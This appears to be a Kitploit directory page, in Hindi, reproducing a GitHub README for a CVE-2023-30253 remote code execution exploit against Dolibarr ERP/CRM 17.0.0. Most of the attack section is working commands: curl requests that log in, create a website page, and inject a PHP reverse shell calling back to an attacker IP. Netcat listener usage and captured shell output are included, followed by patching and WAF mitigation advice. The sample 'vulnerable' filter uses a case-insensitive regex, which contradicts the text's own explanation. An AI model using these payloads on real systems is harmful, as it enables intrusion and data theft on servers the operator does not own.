Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2023-30253-exploit — CVE-2023-30253 — Dolibarr ERP/CRM 17.0.0 PHP कोड इंजेक्शन के माध्यम से RCE (शैक्षिक एक्सप्लॉइट) | Kitploit
उपकरण/GitHubGitHub/jeanback1/cve-2023-30253-exploit
भेद्यता विश्लेषणकोड विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षापेलोड डेवलपमेंट
GitHubjeanback1/cve-2023-30253-exploit

CVE-2023-30253-exploit

CVE-2023-30253 — Dolibarr ERP/CRM 17.0.0 PHP कोड इंजेक्शन के माध्यम से RCE (शैक्षिक एक्सप्लॉइट)

रिपॉजिटरी देखें
43 महीने पहलेअभी तक समीक्षित नहीं
वेबसाइट

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2023-30253 — Dolibarr ERP/CRM 17.0.0 रिमोट कोड एक्ज़ीक्यूशन

Python 3.8+ License CVSS

Dolibarr ERP/CRM v17.0.0 के लिए PHP कोड इंजेक्शन एक्सप्लॉइट, जो Website/CMS मॉड्यूल के माध्यम से www-data उपयोगकर्ता के रूप में रिवर्स शेल प्राप्त करने की अनुमति देता है।

⚠️ केवल शैक्षिक उपयोग और अधिकृत ऑडिट के लिए।


📑 विषय-सूची

  • CVE-2023-30253 क्या है?
  • यह भेद्यता कैसे काम करती है?
  • प्रभाव
  • यह एक्सप्लॉइट क्या करता है?
  • आवश्यकताएँ
  • स्थापना
  • उपयोग
  • व्यावहारिक उदाहरण
  • एक्सप्लॉइट चरण-दर-चरण
  • शमन
  • संदर्भ

  • 🔍 CVE-2023-30253 क्या है?

    CVE-2023-30253, 17.0.1 से पहले के संस्करणों वाले Dolibarr ERP/CRM में PHP कोड इंजेक्शन (CWE-94: Improper Control of Generation of Code) की एक भेद्यता है।

    इसे Swascan (अब Hacktivesecurity) की टीम ने मई 2023 में खोजा और रिपोर्ट किया। यह भेद्यता Website/CMS मॉड्यूल में स्थित है, जो प्रमाणित उपयोगकर्ताओं को Dolibarr के भीतर वेबसाइट बनाने और प्रबंधित करने की अनुमति देता है।

    फ़ील्डमान
    CVECVE-2023-30253
    CVSS v3.18.8 (HIGH)
    VectorAV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    प्रकारCWE-94 — Code Injection
    प्रभावित सॉफ़्टवेयरDolibarr ERP/CRM < 17.0.1
    विशेषाधिकारप्रमाणित उपयोगकर्ता (कोई भी भूमिका)
    पैचDolibarr 17.0.1 — commit 4f6055c

    ⚙️ यह भेद्यता कैसे काम करती है?

    Dolibarr उपयोगकर्ताओं को Website मॉड्यूल के पृष्ठों की सामग्री में PHP कोड इंजेक्ट करने से रोकने के लिए एक फ़िल्टर लागू करता है। हालाँकि, इस फ़िल्टर में एक गंभीर दोष है: यह case-sensitive है।

    root@kitploit:~
    // Código vulnerable (simplificado) en Dolibarr 17.0.0
    if (preg_match('/<\?php/i', $content)) {
        // Bloquea solo "<?php" en minúsculas exactas... ¿o no?
        die("PHP code detected!");
    }
    

    फ़िल्टर शाब्दिक रूप से लोअरकेस में <?php स्ट्रिंग की खोज करता है। लेकिन PHP ओपनिंग टैग के लिए अपरकेस और लोअरकेस के किसी भी संयोजन की अनुमति देता है। इसका अर्थ है:

    टैगफ़िल्टर हुआ?PHP द्वारा निष्पादित?
    <?php ... ?>✅✅
    <?PHP ... ?>❌✅
    <?Php ... ?>❌✅
    <?pHp ... ?>❌✅

    एक्सप्लॉइट फ़िल्टर को बायपास करने के लिए <?PHP (अपरकेस में) का उपयोग करता है, लेकिन कोई भी वेरिएंट काम करता है।

    इसके अलावा, फ़िल्टर केवल सामग्री को सहेजने के समय लागू होता है। पृष्ठ को सर्व करते समय, Dolibarr सामग्री को बिना अतिरिक्त सैनिटाइज़ेशन के PHP इंटरप्रेटर को भेजता है, जो <? ओपनिंग टैग वाले किसी भी कोड को निष्पादित करता है।


    💥 प्रभाव

    एक प्रमाणित हमलावर निम्नलिखित कर सकता है:

    • सर्वर पर रिमोट कमांड निष्पादन (RCE)
    • Dolibarr डेटाबेस तक पहुँच (ग्राहक, चालान, उपयोगकर्ता)
    • सिस्टम की संवेदनशील फ़ाइलें पढ़ना (/etc/passwd, कॉन्फ़िगरेशन)
    • सर्वर को आंतरिक हमलों के लिए पिवट पॉइंट के रूप में उपयोग करना
    • मैलवेयर, वेबशेल या स्थायी बैकडोर इंस्टॉल करना

    यह गंभीर क्यों है? Dolibarr का उपयोग एंटरप्राइज़ ERP/CRM के रूप में किया जाता है। एक घुसपैठ ग्राहक डेटा, वित्त, अनुबंध और आंतरिक क्रेडेंशियल उजागर कर सकती है।


    🛠️ यह एक्सप्लॉइट क्या करता है?

    एक्सप्लॉइट पूरी प्रक्रिया को 5 चरणों में स्वचालित करता है:

    root@kitploit:~
    ┌─────────────────────────────────────────────────────────┐
    │                   CVE-2023-30253                       │
    │                                                         │
    │  1. Login          → Autenticarse en Dolibarr           │
    │  2. Create Website → Crear un sitio web vacío           │
    │  3. Create Page    → Crear una página en el sitio       │
    │  4. Inject Shell   → Inyectar PHP reverse shell         │
    │  5. Trigger        → Ejecutar el payload                │
    │                                                         │
    │  Resultado: 🎯 Shell reversa como www-data              │
    └─────────────────────────────────────────────────────────┘
    

    विशेषताएँ:

    • ✅ एंटी-CSRF टोकन का स्वचालित प्रबंधन
    • ✅ कुकीज़ के साथ स्थायी सत्र
    • ✅ pageid का स्वचालित पता लगाना
    • ✅ डीबगिंग के लिए वर्बोज़ मोड
    • ✅ रंगीन आउटपुट (बंद करने योग्य)
    • ✅ fsockopen + proc_open के माध्यम से रिवर्स शेल पेलोड

    📋 आवश्यकताएँ

    • Python 3.8+
    • requests
    • beautifulsoup4

    या बस:

    root@kitploit:~
    pip install -r requirements.txt
    

    📦 स्थापना

    root@kitploit:~
    # Clonar el repositorio
    git clone https://github.com/jeanback1/CVE-2023-30253-exploit.git
    cd CVE-2023-30253-exploit
    
    # Instalar dependencias
    pip install -r requirements.txt
    

    🚀 उपयोग

    root@kitploit:~
    python exploit.py <target> <username> <password> <lhost> <lport> [opciones]
    

    स्थितीय तर्क:

    तर्कविवरणउदाहरण
    targetDolibarr का आधार URLhttp://crm.board.htb
    usernameDolibarr उपयोगकर्ताadmin
    passwordDolibarr पासवर्डadmin
    lhostआपका IP (जहाँ आप शेल प्राप्त करेंगे)10.10.14.5
    lportआपका पोर्ट (जहाँ आप शेल प्राप्त करेंगे)4444

    विकल्प:

    विकल्पविवरण
    -v, --verboseविस्तृत डीबग जानकारी दिखाता है
    --no-colorआउटपुट में रंग निष्क्रिय करता है
    -h, --helpसहायता और उदाहरण दिखाता है

    🎯 व्यावहारिक उदाहरण

    टर्मिनल 1 — रिवर्स शेल लिसनर प्रारंभ करें

    root@kitploit:~
    nc -lvnp 4444
    

    टर्मिनल 2 — एक्सप्लॉइट चलाएँ

    root@kitploit:~
    python exploit.py http://crm.board.htb admin admin 10.10.14.5 4444 --verbose
    

    अपेक्षित आउटपुट

    root@kitploit:~
    ════════════════════════════════════════════════════════
     CVE-2023-30253 — Dolibarr 17.0.0 RCE Exploit
    ════════════════════════════════════════════════════════
    
      Target:   http://crm.board.htb
      User:     admin
      LHOST:    10.10.14.5
      LPORT:    4444
      Site ID:  s3a1f2bc
    
    ──────────────────────────────────────────────────
    
    [10:45:12] Paso 1/5: Iniciando sesión...
    [10:45:12]   ✓ Sesión iniciada correctamente
    
    [10:45:13] Paso 2/5: Creando sitio web...
    [10:45:13]   ✓ Sitio web 's3a1f2bc' creado
    
    [10:45:13] Paso 3/5: Creando página en el sitio...
    [10:45:13]   ✓ Página creada dentro del sitio
    
    [10:45:14] Paso 4/5: Inyectando reverse shell → 10.10.14.5:4444...
    [10:45:14]   ✓ Código PHP inyectado exitosamente
    
    [10:45:14] Paso 5/5: Ejecutando payload (trigger)...
    
    ════════════════════════════════════════════════════════
      EXPLOTACIÓN COMPLETADA
    ════════════════════════════════════════════════════════
    
      Trigger URL:
      http://crm.board.htb/public/website/index.php?website=s3a1f2bc&pageref=s3a1f2bc
    
      Instrucciones:
      1. En otra terminal, inicia tu listener:
         nc -lvnp 4444
      2. Accede a la Trigger URL (el exploit ya lo hizo)
      3. Recibirás una shell reversa como www-data
    

    टर्मिनल 1 — शेल प्राप्त हुई 🎯

    root@kitploit:~
    Listening on 0.0.0.0 4444
    Connection received on 10.129.231.37 52846
    $ id
    uid=33(www-data) gid=33(www-data) groups=33(www-data)
    

    🔬 एक्सप्लॉइट चरण-दर-चरण

    यदि आप प्रक्रिया को मैन्युअल रूप से (स्क्रिप्ट के बिना) समझना चाहते हैं, तो यहाँ पूरा फ़्लो है:

    1. प्रमाणीकरण

    root@kitploit:~
    # Obtener cookies y token CSRF
    curl -c cookies.txt http://crm.board.htb/ > /dev/null
    
    # Extraer token
    TOKEN=$(curl -s -b cookies.txt http://crm.board.htb/ \
      | grep -oP 'name="anti-csrf-newtoken" content="\K[^"]+')
    
    # Login
    curl -b cookies.txt -c cookies.txt \
      -X POST "http://crm.board.htb/index.php?mainmenu=home" \
      -d "token=$TOKEN&actionlogin=login&loginfunction=loginfunction&username=admin&password=admin"
    

    2. एक वेबसाइट बनाएँ

    root@kitploit:~
    TOKEN=$(curl -s -b cookies.txt \
      "http://crm.board.htb/website/index.php?action=createsite" \
      | grep -oP 'name="anti-csrf-newtoken" content="\K[^"]+')
    
    curl -b cookies.txt -X POST \
      "http://crm.board.htb/website/index.php" \
      -d "token=$TOKEN&action=addsite&WEBSITE_REF=misitio&WEBSITE_TITLE=misitio&addcontainer=Create"
    

    ⚠️ सीखा गया सबक: सही action पैरामीटर addsite है, न कि add जैसा कि कुछ सार्वजनिक एक्सप्लॉइट्स में दिखाई देता है।

    3. एक पृष्ठ बनाएँ

    root@kitploit:~
    TOKEN=$(curl -s -b cookies.txt \
      "http://crm.board.htb/website/index.php?website=misitio" \
      | grep -oP 'name="anti-csrf-newtoken" content="\K[^"]+')
    
    curl -b cookies.txt -X POST \
      "http://crm.board.htb/website/index.php" \
      -d "token=$TOKEN&action=addcontainer&website=misitio&WEBSITE_TYPE_CONTAINER=page&WEBSITE_TITLE=TEST&addcontainer=Create"
    

    4. PHP कोड इंजेक्ट करें

    root@kitploit:~
    TOKEN=$(curl -s -b cookies.txt \
      "http://crm.board.htb/website/index.php?website=misitio&pageid=1&action=editsource" \
      | grep -oP 'name="anti-csrf-newtoken" content="\K[^"]+')
    
    PHP='<?PHP $s=fsockopen("10.10.14.5",4444);proc_open("/bin/sh -i",array(0=>$s,1=>$s,2=>$s),$p);?>'
    
    curl -b cookies.txt -X POST \
      "http://crm.board.htb/website/index.php" \
      --data-urlencode "token=$TOKEN" \
      --data-urlencode "action=updatesource" \
      --data-urlencode "website=misitio" \
      --data-urlencode "PAGE_CONTENT=$PHP"
    

    🔑 हमले की कुंजी: सही फ़ील्ड PAGE_CONTENT है, न कि WEBSITE_CONTENT। कई सार्वजनिक PoCs में यह गलती है।

    5. पेलोड निष्पादित करें

    root@kitploit:~
    curl "http://crm.board.htb/public/website/index.php?website=misitio&pageref=misitio"
    

    🛡️ शमन

    इस भेद्यता से Dolibarr सर्वर की सुरक्षा के लिए:

    अपडेट करें (अनुशंसित)

    root@kitploit:~
    # Actualizar a Dolibarr 17.0.1 o superior
    # El parche corrige el filtro para detectar cualquier variante de <?php
    

    Website मॉड्यूल निष्क्रिय करें

    यदि आप Website/CMS मॉड्यूल का उपयोग नहीं करते हैं, तो इसे यहाँ से निष्क्रिय करें:

    root@kitploit:~
    Home → Setup → Modules → Website → Desactivar
    

    WAF नियम (mod_security)

    root@kitploit:~
    # Bloquear cualquier variante de etiquetas PHP en el campo PAGE_CONTENT
    SecRule ARGS:PAGE_CONTENT "@rx <\?php|< \?php|<\?PHP|<\?[pP][hH][pP]" \
      "id:1001,phase:2,deny,status:403,msg:'CVE-2023-30253 PHP Injection blocked'"
    

    न्यूनतम विशेषाधिकार का सिद्धांत

    • सामान्य उपयोगकर्ताओं के लिए एडमिन खातों का उपयोग न करें
    • Website मॉड्यूल तक कौन पहुँच सकता है, इसे सीमित करें

    📚 संदर्भ

    • NVD — CVE-2023-30253
    • Swascan Advisory — Dolibarr 17.0.0 Analysis
    • Dolibarr GitHub — पैच कमिट
    • CWE-94: Code Injection
    • Hacktivesecurity — मूल रिपोर्ट

    📝 अस्वीकरण

    यह प्रोजेक्ट शैक्षिक और सूचना सुरक्षा अनुसंधान उद्देश्यों के लिए बनाया गया है। स्पष्ट प्राधिकरण के बिना सिस्टम के विरुद्ध इस एक्सप्लॉइट का उपयोग अवैध और नैतिक रूप से निंदनीय है।

    साइबर सुरक्षा पेशेवर के रूप में, मैं दृढ़ता से निम्नलिखित में विश्वास करता हूँ:

    • भेद्यताओं का जिम्मेदार प्रकटीकरण
    • प्राधिकरण के साथ नैतिक हैकिंग
    • सामूहिक सुरक्षा को बेहतर बनाने के लिए ज्ञान साझा करना

    द्वारा निर्मित Jean Carlos
    साइबर सुरक्षा छात्र | पेंटेस्टिंग | CTF प्लेयर
    CVE-2021-3560 • CVE-2023-27163 • CVE-2024-46986 • CVE-2025-2304

    टूल डाउनलोड करें